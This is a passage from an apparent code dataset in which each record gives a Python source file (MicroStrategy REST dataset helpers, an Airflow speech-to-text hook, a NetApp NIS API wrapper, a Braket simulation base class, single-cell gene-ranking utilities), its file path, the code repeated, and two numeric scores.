session_id (str): Identifier for the server session used for collecting uploaded data.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.delete(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response | mstrio/api/datasets.py | import requests
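# Typical call flow (sketch, using only the helpers in this module):
#   single-table: create_dataset(), then update_dataset() for incremental loads
#   multi-table:  create_multitable_dataset() -> upload_session() -> upload() -> publish(),
#                 polling publish_status() or aborting with publish_cancel()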
def dataset_definition(connection, dataset_id, fields=None, verbose=False):
"""Get the definition of a dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
fields (list, optional): Specifies object types to be returned. Possible values include tables, columns,
attributes, and metrics. If no value is set, attributes and metrics are returned.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.get(url=connection.base_url + '/datasets/' + dataset_id,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
params={'fields': fields},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def create_dataset(connection, body, verbose=False):
"""Create a single-table dataset from external data uploaded to the MicroStrategy Intelligence Server.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
body (str): JSON-formatted definition of the dataset. Generated by `utils.formjson()`.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def update_dataset(connection, dataset_id, table_name, update_policy, body, verbose=False, table_id=None):
"""Update a single-table dataset with external data uploaded to the MicroStrategy Intelligence Server.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
table_name (str): Name of the table to update within the MicroStrategy dataset.
update_policy (str): Update operation type: 'Add' (inserts new, unique rows), 'Update' (updates data in
existing rows and columns), 'Upsert' (updates existing data and inserts new rows), 'Replace' (similar to
truncate, replaces the existing data with new data).
body (str): JSON-formatted definition of the dataset. Generated by `utils.formjson()`.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.patch(url=connection.base_url + '/datasets/' + dataset_id + '/tables/' + table_name,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id,
'updatePolicy': update_policy},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def delete_dataset(connection, dataset_id, verbose=False):
"""Delete a dataset previously created using the REST API.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.delete(url=connection.base_url + '/objects/' + dataset_id + '?type=3',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies, verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def create_multitable_dataset(connection, body, verbose=False):
"""Create the definition of a multi-table dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
body (dict): JSON-formatted payload containing the body of the request.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets/models',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def upload_session(connection, dataset_id, body, verbose=False):
"""Create a multi-table dataset upload session.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
body (dict): JSON-formatted payload containing the body of the request.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def upload(connection, dataset_id, session_id, body, verbose=False):
"""Upload data to a multi-table dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
session_id (str): Identifier of the server session used for collecting uploaded data.
body (dict): JSON-formatted payload containing the body of the request.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.put(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
json=body,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def publish(connection, dataset_id, session_id, verbose=False):
"""Publish a multi-table dataset.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
        session_id (str): Identifier for the server session used for collecting uploaded data.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.post(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id + '/publish',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def publish_status(connection, dataset_id, session_id, verbose=False):
"""Get multi-table dataset publication status.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
        session_id (str): Identifier for the server session used for collecting uploaded data.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.get(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id + '/publishStatus',
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response
def publish_cancel(connection, dataset_id, session_id, verbose=False):
"""Delete a multi-table dataset upload session and cancel publication.
Args:
connection (object): MicroStrategy connection object returned by `microstrategy.Connection()`.
dataset_id (str): Identifier of a pre-existing dataset. Used when updating a pre-existing dataset.
        session_id (str): Identifier for the server session used for collecting uploaded data.
verbose (bool, optional): Verbosity of server responses; defaults to False.
Returns:
HTTP response object returned by the MicroStrategy REST server
"""
response = requests.delete(url=connection.base_url + '/datasets/' + dataset_id + '/uploadSessions/' + session_id,
headers={'X-MSTR-AuthToken': connection.auth_token,
'X-MSTR-ProjectID': connection.project_id},
cookies=connection.cookies,
verify=connection.ssl_verify)
if verbose:
print(response.url)
return response | 0.856558 | 0.375907 |
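# Editor's note: a minimal, hypothetical sketch of how the REST helpers above chain
# together for a multi-table dataset: create the model, open an upload session, push
# the data, publish, then poll the publication status. `conn`, `model_body`,
# `session_body` and `data_body` are placeholders, and the response JSON keys
# ('id', 'uploadSessionId') are assumptions about the MicroStrategy REST payloads.
def _example_multitable_workflow(conn, model_body, session_body, data_body, verbose=False):
    dataset_id = create_multitable_dataset(conn, body=model_body, verbose=verbose).json()['id']
    session_id = upload_session(conn, dataset_id, body=session_body, verbose=verbose).json()['uploadSessionId']
    upload(conn, dataset_id, session_id, body=data_body, verbose=verbose)
    publish(conn, dataset_id, session_id, verbose=verbose)
    return publish_status(conn, dataset_id, session_id, verbose=verbose).json()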
"""This module contains a Google Cloud Speech Hook."""
from typing import Dict, Optional, Sequence, Union
from google.api_core.retry import Retry
from google.cloud.speech_v1 import SpeechClient
from google.cloud.speech_v1.types import RecognitionAudio, RecognitionConfig
from airflow.providers.google.common.consts import CLIENT_INFO
from airflow.providers.google.common.hooks.base_google import GoogleBaseHook
class CloudSpeechToTextHook(GoogleBaseHook):
"""
Hook for Google Cloud Speech API.
:param gcp_conn_id: The connection ID to use when fetching connection info.
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account.
"""
def __init__(
self,
gcp_conn_id: str = "google_cloud_default",
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
) -> None:
super().__init__(
gcp_conn_id=gcp_conn_id,
delegate_to=delegate_to,
impersonation_chain=impersonation_chain,
)
self._client = None
def get_conn(self) -> SpeechClient:
"""
Retrieves connection to Cloud Speech.
:return: Google Cloud Speech client object.
:rtype: google.cloud.speech_v1.SpeechClient
"""
if not self._client:
self._client = SpeechClient(credentials=self._get_credentials(), client_info=CLIENT_INFO)
return self._client
@GoogleBaseHook.quota_retry()
def recognize_speech(
self,
config: Union[Dict, RecognitionConfig],
audio: Union[Dict, RecognitionAudio],
retry: Optional[Retry] = None,
timeout: Optional[float] = None,
):
"""
Recognizes audio input
:param config: information to the recognizer that specifies how to process the request.
https://googleapis.github.io/google-cloud-python/latest/speech/gapic/v1/types.html#google.cloud.speech_v1.types.RecognitionConfig
:param audio: audio data to be recognized
https://googleapis.github.io/google-cloud-python/latest/speech/gapic/v1/types.html#google.cloud.speech_v1.types.RecognitionAudio
:param retry: (Optional) A retry object used to retry requests. If None is specified,
requests will not be retried.
:param timeout: (Optional) The amount of time, in seconds, to wait for the request to complete.
Note that if retry is specified, the timeout applies to each individual attempt.
"""
client = self.get_conn()
response = client.recognize(config=config, audio=audio, retry=retry, timeout=timeout)
self.log.info("Recognised speech: %s", response)
return response | airflow/providers/google/cloud/hooks/speech_to_text.py | """This module contains a Google Cloud Speech Hook."""
from typing import Dict, Optional, Sequence, Union
from google.api_core.retry import Retry
from google.cloud.speech_v1 import SpeechClient
from google.cloud.speech_v1.types import RecognitionAudio, RecognitionConfig
from airflow.providers.google.common.consts import CLIENT_INFO
from airflow.providers.google.common.hooks.base_google import GoogleBaseHook
class CloudSpeechToTextHook(GoogleBaseHook):
"""
Hook for Google Cloud Speech API.
:param gcp_conn_id: The connection ID to use when fetching connection info.
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account.
"""
def __init__(
self,
gcp_conn_id: str = "google_cloud_default",
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
) -> None:
super().__init__(
gcp_conn_id=gcp_conn_id,
delegate_to=delegate_to,
impersonation_chain=impersonation_chain,
)
self._client = None
def get_conn(self) -> SpeechClient:
"""
Retrieves connection to Cloud Speech.
:return: Google Cloud Speech client object.
:rtype: google.cloud.speech_v1.SpeechClient
"""
if not self._client:
self._client = SpeechClient(credentials=self._get_credentials(), client_info=CLIENT_INFO)
return self._client
@GoogleBaseHook.quota_retry()
def recognize_speech(
self,
config: Union[Dict, RecognitionConfig],
audio: Union[Dict, RecognitionAudio],
retry: Optional[Retry] = None,
timeout: Optional[float] = None,
):
"""
Recognizes audio input
:param config: information to the recognizer that specifies how to process the request.
https://googleapis.github.io/google-cloud-python/latest/speech/gapic/v1/types.html#google.cloud.speech_v1.types.RecognitionConfig
:param audio: audio data to be recognized
https://googleapis.github.io/google-cloud-python/latest/speech/gapic/v1/types.html#google.cloud.speech_v1.types.RecognitionAudio
:param retry: (Optional) A retry object used to retry requests. If None is specified,
requests will not be retried.
:param timeout: (Optional) The amount of time, in seconds, to wait for the request to complete.
Note that if retry is specified, the timeout applies to each individual attempt.
"""
client = self.get_conn()
response = client.recognize(config=config, audio=audio, retry=retry, timeout=timeout)
self.log.info("Recognised speech: %s", response)
return response | 0.952431 | 0.42471 |
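# Editor's note: a minimal usage sketch for the hook above, outside of an operator.
# The connection id, bucket URI and RecognitionConfig values are placeholders;
# config/audio may be passed as plain dicts (as here) or as the
# google.cloud.speech_v1 types imported at the top of that module.
def _example_recognize_speech(gcs_uri='gs://my-bucket/sample.flac'):
    hook = CloudSpeechToTextHook(gcp_conn_id='google_cloud_default')
    config = {'encoding': 'LINEAR16', 'language_code': 'en_US'}
    audio = {'uri': gcs_uri}
    return hook.recognize_speech(config=config, audio=audio)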
from netapp.connection import NaConnection
from nis_get_iter_key_td import NisGetIterKeyTd # 2 properties
from nis_domain_config_info import NisDomainConfigInfo # 4 properties
class NisConnection(NaConnection):
def nis_get(self, nis_domain, desired_attributes=None):
"""
Get NIS domain configuration.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
:param desired_attributes: Specify the attributes that should be returned.
If not present, all attributes for which information is available
will be returned.
If present, only the desired attributes for which information is
available will be returned.
"""
return self.request( "nis-get", {
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
'desired_attributes': [ desired_attributes, 'desired-attributes', [ NisDomainConfigInfo, 'None' ], False ],
}, {
'attributes': [ NisDomainConfigInfo, False ],
} )
def nis_destroy(self, nis_domain):
"""
Destroy an existing NIS configuration.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
"""
return self.request( "nis-destroy", {
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
}, {
} )
def nis_modify(self, nis_domain, is_active=None, nis_servers=None):
"""
Modify the attributes of NIS configuration.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
:param is_active: Specifies whether the NIS domain configuration is active or
inactive.
:param nis_servers: Specifies the IP address of one or more NIS servers in the
domain.
"""
return self.request( "nis-modify", {
'is_active': [ is_active, 'is-active', [ bool, 'None' ], False ],
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
'nis_servers': [ nis_servers, 'nis-servers', [ basestring, 'ip-address' ], True ],
}, {
} )
def nis_create(self, is_active, nis_domain, nis_servers, return_record=None):
"""
Create an NIS domain configuration.
Multiple NIS domains can be configured on a single Vserver, but
only one NIS domain can be active at any given time.
:param is_active: Specifies whether the NIS domain configuration is active or
inactive.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
:param nis_servers: Specifies the IP address of one or more NIS servers in the
domain.
:param return_record: If set to true, returns the NIS domain configuration on
successful creation.
Default: false
"""
return self.request( "nis-create", {
'is_active': [ is_active, 'is-active', [ bool, 'None' ], False ],
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
'nis_servers': [ nis_servers, 'nis-servers', [ basestring, 'ip-address' ], True ],
'return_record': [ return_record, 'return-record', [ bool, 'None' ], False ],
}, {
'result': [ NisDomainConfigInfo, False ],
} )
def nis_get_iter(self, max_records=None, query=None, tag=None, desired_attributes=None):
"""
Iterate over a list of NIS configurations.
:param max_records: The maximum number of records to return in this call.
Default: 20
:param query: A query that specifies which objects to return.
A query could be specified on any number of attributes in the NIS
domain configuration object.
All NIS domain configuration objects matching this query up to
'max-records' will be returned.
:param tag: Specify the tag from the last call.
It is usually not specified for the first call. For subsequent
calls, copy values from the 'next-tag' obtained from the previous
call.
:param desired_attributes: Specify the attributes that should be returned.
If not present, all attributes for which information is available
will be returned.
If present, only the desired attributes for which information is
available will be returned.
"""
return self.request( "nis-get-iter", {
'max_records': max_records,
'query': [ query, 'query', [ NisDomainConfigInfo, 'None' ], False ],
'tag': tag,
'desired_attributes': [ desired_attributes, 'desired-attributes', [ NisDomainConfigInfo, 'None' ], False ],
}, {
'attributes-list': [ NisDomainConfigInfo, True ],
} ) | generated-libraries/python/netapp/nis/__init__.py | from netapp.connection import NaConnection
from nis_get_iter_key_td import NisGetIterKeyTd # 2 properties
from nis_domain_config_info import NisDomainConfigInfo # 4 properties
class NisConnection(NaConnection):
def nis_get(self, nis_domain, desired_attributes=None):
"""
Get NIS domain configuration.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
:param desired_attributes: Specify the attributes that should be returned.
If not present, all attributes for which information is available
will be returned.
If present, only the desired attributes for which information is
available will be returned.
"""
return self.request( "nis-get", {
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
'desired_attributes': [ desired_attributes, 'desired-attributes', [ NisDomainConfigInfo, 'None' ], False ],
}, {
'attributes': [ NisDomainConfigInfo, False ],
} )
def nis_destroy(self, nis_domain):
"""
Destroy an existing NIS configuration.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
"""
return self.request( "nis-destroy", {
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
}, {
} )
def nis_modify(self, nis_domain, is_active=None, nis_servers=None):
"""
Modify the attributes of NIS configuration.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
:param is_active: Specifies whether the NIS domain configuration is active or
inactive.
:param nis_servers: Specifies the IP address of one or more NIS servers in the
domain.
"""
return self.request( "nis-modify", {
'is_active': [ is_active, 'is-active', [ bool, 'None' ], False ],
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
'nis_servers': [ nis_servers, 'nis-servers', [ basestring, 'ip-address' ], True ],
}, {
} )
def nis_create(self, is_active, nis_domain, nis_servers, return_record=None):
"""
Create an NIS domain configuration.
Multiple NIS domains can be configured on a single Vserver, but
only one NIS domain can be active at any given time.
:param is_active: Specifies whether the NIS domain configuration is active or
inactive.
:param nis_domain: Specifies the NIS domain.
For example: 'example.com'
:param nis_servers: Specifies the IP address of one or more NIS servers in the
domain.
:param return_record: If set to true, returns the NIS domain configuration on
successful creation.
Default: false
"""
return self.request( "nis-create", {
'is_active': [ is_active, 'is-active', [ bool, 'None' ], False ],
'nis_domain': [ nis_domain, 'nis-domain', [ basestring, 'None' ], False ],
'nis_servers': [ nis_servers, 'nis-servers', [ basestring, 'ip-address' ], True ],
'return_record': [ return_record, 'return-record', [ bool, 'None' ], False ],
}, {
'result': [ NisDomainConfigInfo, False ],
} )
def nis_get_iter(self, max_records=None, query=None, tag=None, desired_attributes=None):
"""
Iterate over a list of NIS configurations.
:param max_records: The maximum number of records to return in this call.
Default: 20
:param query: A query that specifies which objects to return.
A query could be specified on any number of attributes in the NIS
domain configuration object.
All NIS domain configuration objects matching this query up to
'max-records' will be returned.
:param tag: Specify the tag from the last call.
It is usually not specified for the first call. For subsequent
calls, copy values from the 'next-tag' obtained from the previous
call.
:param desired_attributes: Specify the attributes that should be returned.
If not present, all attributes for which information is available
will be returned.
If present, only the desired attributes for which information is
available will be returned.
"""
return self.request( "nis-get-iter", {
'max_records': max_records,
'query': [ query, 'query', [ NisDomainConfigInfo, 'None' ], False ],
'tag': tag,
'desired_attributes': [ desired_attributes, 'desired-attributes', [ NisDomainConfigInfo, 'None' ], False ],
}, {
'attributes-list': [ NisDomainConfigInfo, True ],
} ) | 0.874064 | 0.390766 |
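# Editor's note: a hypothetical sketch of driving the NIS calls above. How a
# NisConnection is constructed (filer address, credentials) is defined elsewhere in
# this generated SDK, so `conn` is assumed to be an existing NisConnection; the
# domain name and server addresses are placeholders.
def _example_nis_configuration(conn):
    conn.nis_create(is_active=True, nis_domain='example.com',
                    nis_servers=['192.0.2.10', '192.0.2.11'], return_record=True)
    domains = conn.nis_get_iter(max_records=20)
    conn.nis_modify('example.com', is_active=False)
    return domains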
from typing import List
import numpy as np
from braket.default_simulator.operation import GateOperation, Observable
class Simulation:
"""
This class tracks the evolution of a quantum system with `qubit_count` qubits.
    The state of the system evolves by application of `GateOperation`s using the `evolve()` method.
"""
def __init__(self, qubit_count: int, shots: int):
r"""
Args:
qubit_count (int): The number of qubits being simulated.
All the qubits start in the :math:`\ket{\mathbf{0}}` computational basis state.
shots (int): The number of samples to take from the simulation.
If set to 0, only results that do not require sampling, such as density matrix
or expectation, are generated.
"""
self._qubit_count = qubit_count
self._shots = shots
@property
def qubit_count(self) -> int:
"""int: The number of qubits being simulated by the simulation."""
return self._qubit_count
@property
def shots(self) -> int:
"""
int: The number of samples to take from the simulation.
0 means no samples are taken, and results that require sampling
to calculate cannot be returned.
"""
return self._shots
def evolve(self, operations: List[GateOperation]) -> None:
"""Evolves the state of the simulation under the action of
the specified gate operations.
Args:
operations (List[GateOperation]): Gate operations to apply for
evolving the state of the simulation.
Note:
This method mutates the state of the simulation.
"""
raise NotImplementedError("evolve has not been implemented.")
def expectation(self, observable: Observable) -> float:
"""The expected value of the observable in the given state.
Args:
observable (Observable): The observable to measure.
Returns:
float: The expected value of the observable.
"""
raise NotImplementedError("expectation has not been implemented.")
def retrieve_samples(self) -> List[int]:
"""Retrieves samples of states from the state of the simulation,
based on the probabilities.
Returns:
List[int]: List of states sampled according to their probabilities
in the state. Each integer represents the decimal encoding of the
corresponding computational basis state.
"""
raise NotImplementedError("retrieve_samples has not been implemented.")
@property
def probabilities(self) -> np.ndarray:
"""np.ndarray: The probabilities of each computational basis state."""
raise NotImplementedError("probabilities has not been implemented.") | src/braket/default_simulator/simulation.py |
from typing import List
import numpy as np
from braket.default_simulator.operation import GateOperation, Observable
class Simulation:
"""
This class tracks the evolution of a quantum system with `qubit_count` qubits.
    The state of the system evolves by application of `GateOperation`s using the `evolve()` method.
"""
def __init__(self, qubit_count: int, shots: int):
r"""
Args:
qubit_count (int): The number of qubits being simulated.
All the qubits start in the :math:`\ket{\mathbf{0}}` computational basis state.
shots (int): The number of samples to take from the simulation.
If set to 0, only results that do not require sampling, such as density matrix
or expectation, are generated.
"""
self._qubit_count = qubit_count
self._shots = shots
@property
def qubit_count(self) -> int:
"""int: The number of qubits being simulated by the simulation."""
return self._qubit_count
@property
def shots(self) -> int:
"""
int: The number of samples to take from the simulation.
0 means no samples are taken, and results that require sampling
to calculate cannot be returned.
"""
return self._shots
def evolve(self, operations: List[GateOperation]) -> None:
"""Evolves the state of the simulation under the action of
the specified gate operations.
Args:
operations (List[GateOperation]): Gate operations to apply for
evolving the state of the simulation.
Note:
This method mutates the state of the simulation.
"""
raise NotImplementedError("evolve has not been implemented.")
def expectation(self, observable: Observable) -> float:
"""The expected value of the observable in the given state.
Args:
observable (Observable): The observable to measure.
Returns:
float: The expected value of the observable.
"""
raise NotImplementedError("expectation has not been implemented.")
def retrieve_samples(self) -> List[int]:
"""Retrieves samples of states from the state of the simulation,
based on the probabilities.
Returns:
List[int]: List of states sampled according to their probabilities
in the state. Each integer represents the decimal encoding of the
corresponding computational basis state.
"""
raise NotImplementedError("retrieve_samples has not been implemented.")
@property
def probabilities(self) -> np.ndarray:
"""np.ndarray: The probabilities of each computational basis state."""
raise NotImplementedError("probabilities has not been implemented.") | 0.974288 | 0.835886 |
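# Editor's note: an illustrative subclass (not part of the simulator) showing the
# contract the abstract hooks above define. It only handles operations whose matrix
# spans the full register, an assumption made to keep the sketch short; the real
# simulators contract each gate's matrix onto its target qubits.
class _FullMatrixSimulation(Simulation):
    def __init__(self, qubit_count: int, shots: int):
        super().__init__(qubit_count, shots)
        self._state = np.zeros(2 ** qubit_count, dtype=complex)
        self._state[0] = 1.0  # start in the |0...0> basis state

    def evolve(self, operations: List[GateOperation]) -> None:
        for operation in operations:
            # assumes operation.matrix acts on the whole 2**qubit_count space
            self._state = operation.matrix @ self._state

    @property
    def probabilities(self) -> np.ndarray:
        return np.abs(self._state) ** 2

    def retrieve_samples(self) -> List[int]:
        return list(np.random.choice(2 ** self.qubit_count, self.shots, p=self.probabilities))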
import torch
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from collections import defaultdict
def mean_of_attention_heads(matrix, out_dim):
chunks = torch.split(matrix, out_dim, dim=1)
return torch.mean(torch.stack(chunks), dim=0)
def latent_dim_participation_in_clusters(latent_data, labels):
latent_diff = np.zeros(shape=(latent_data.shape[1], len(set(labels)) + 1))
for l_dim in range(latent_data.shape[1]):
cells_in_dim = latent_data[:, l_dim]
l_dim_mean = np.mean(cells_in_dim)
l_dim_std = np.std(cells_in_dim)
variable_cells_larger = np.where(cells_in_dim > l_dim_mean + l_dim_std)
variable_cells_smaller = np.where(cells_in_dim < l_dim_mean - l_dim_std)
labels_larger = labels[variable_cells_larger]
labels_smaller = labels[variable_cells_smaller]
variable_labels = np.concatenate((labels_larger, labels_smaller), axis=None)
cluster_count = {x: list(variable_labels).count(x) for x in labels}
counter_per_cluster = np.array(list(cluster_count.values())) / len(variable_labels)
counter_per_cluster = np.around(counter_per_cluster * 100.0, decimals=2)
latent_diff[l_dim][1:] = counter_per_cluster
latent_diff[l_dim][0] = int(l_dim)
cluster_label = [str(i) for i in np.unique(labels)]
latent_diff = pd.DataFrame(latent_diff, columns=['Latent dimension'] + cluster_label)
latent_diff['Latent dimension'] = latent_diff['Latent dimension'].astype(int)
latent_diff = latent_diff.melt(id_vars=['Latent dimension'], value_vars=cluster_label, var_name='Cluster',
value_name='Percentage')
sns.set(font_scale=2.5)
sns.set_style("whitegrid")
g = sns.catplot(x='Cluster', y='Percentage', col='Latent dimension', data=latent_diff, palette=sns.color_palette("hls", len(set(labels))), col_wrap=5,
kind="bar", ci=None, aspect=1.3, legend_out=True)
for ax in g.axes:
ax.set_xticklabels(sorted(set(labels)))
plt.setp(ax.get_xticklabels(), visible=True)
for ax in g.axes.flatten():
ax.tick_params(labelbottom=True)
return latent_diff
def _indices_of_top_k(arr, k):
return np.argpartition(arr, -k)[-k:]
def select_genes_by_latent_dim(matrix, latent_dim, top_k):
corresponding_to_latent_dim = matrix[:, latent_dim]
return _indices_of_top_k(corresponding_to_latent_dim.detach().numpy(), top_k)
def merged_count(list_of_tuples):
counter = defaultdict(int)
for lst in list_of_tuples:
for tup in lst:
counter[tup[0]] += tup[1]
return counter | cellvgae/utils/top_genes.py | import torch
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
from collections import defaultdict
def mean_of_attention_heads(matrix, out_dim):
chunks = torch.split(matrix, out_dim, dim=1)
return torch.mean(torch.stack(chunks), dim=0)
def latent_dim_participation_in_clusters(latent_data, labels):
latent_diff = np.zeros(shape=(latent_data.shape[1], len(set(labels)) + 1))
for l_dim in range(latent_data.shape[1]):
cells_in_dim = latent_data[:, l_dim]
l_dim_mean = np.mean(cells_in_dim)
l_dim_std = np.std(cells_in_dim)
variable_cells_larger = np.where(cells_in_dim > l_dim_mean + l_dim_std)
variable_cells_smaller = np.where(cells_in_dim < l_dim_mean - l_dim_std)
labels_larger = labels[variable_cells_larger]
labels_smaller = labels[variable_cells_smaller]
variable_labels = np.concatenate((labels_larger, labels_smaller), axis=None)
cluster_count = {x: list(variable_labels).count(x) for x in labels}
counter_per_cluster = np.array(list(cluster_count.values())) / len(variable_labels)
counter_per_cluster = np.around(counter_per_cluster * 100.0, decimals=2)
latent_diff[l_dim][1:] = counter_per_cluster
latent_diff[l_dim][0] = int(l_dim)
cluster_label = [str(i) for i in np.unique(labels)]
latent_diff = pd.DataFrame(latent_diff, columns=['Latent dimension'] + cluster_label)
latent_diff['Latent dimension'] = latent_diff['Latent dimension'].astype(int)
latent_diff = latent_diff.melt(id_vars=['Latent dimension'], value_vars=cluster_label, var_name='Cluster',
value_name='Percentage')
sns.set(font_scale=2.5)
sns.set_style("whitegrid")
g = sns.catplot(x='Cluster', y='Percentage', col='Latent dimension', data=latent_diff, palette=sns.color_palette("hls", len(set(labels))), col_wrap=5,
kind="bar", ci=None, aspect=1.3, legend_out=True)
for ax in g.axes:
ax.set_xticklabels(sorted(set(labels)))
plt.setp(ax.get_xticklabels(), visible=True)
for ax in g.axes.flatten():
ax.tick_params(labelbottom=True)
return latent_diff
def _indices_of_top_k(arr, k):
return np.argpartition(arr, -k)[-k:]
def select_genes_by_latent_dim(matrix, latent_dim, top_k):
corresponding_to_latent_dim = matrix[:, latent_dim]
return _indices_of_top_k(corresponding_to_latent_dim.detach().numpy(), top_k)
def merged_count(list_of_tuples):
counter = defaultdict(int)
for lst in list_of_tuples:
for tup in lst:
counter[tup[0]] += tup[1]
return counter | 0.742422 | 0.574723 |
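# Editor's note: a small synthetic example of the helpers above. Shapes are
# illustrative only: an attention matrix with num_heads * out_dim columns is
# averaged head-wise, and the top-k gene indices are read off one latent dimension
# of a (genes x latent) weight matrix.
def _example_top_genes():
    attention = torch.rand(100, 8 * 16)                              # e.g. 8 heads, out_dim=16
    per_head_mean = mean_of_attention_heads(attention, out_dim=16)   # -> (100, 16)
    weights = torch.rand(100, 16)                                    # genes x latent dims
    top_gene_idx = select_genes_by_latent_dim(weights, latent_dim=3, top_k=5)
    return per_head_mean.shape, top_gene_idx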
import numpy as np
import random
import keras
class QLearning_NN():
def __init__(self,rl_params,weights_save_dir):
self.parameters = dict(rl_params)
self.weights_save_dir = weights_save_dir
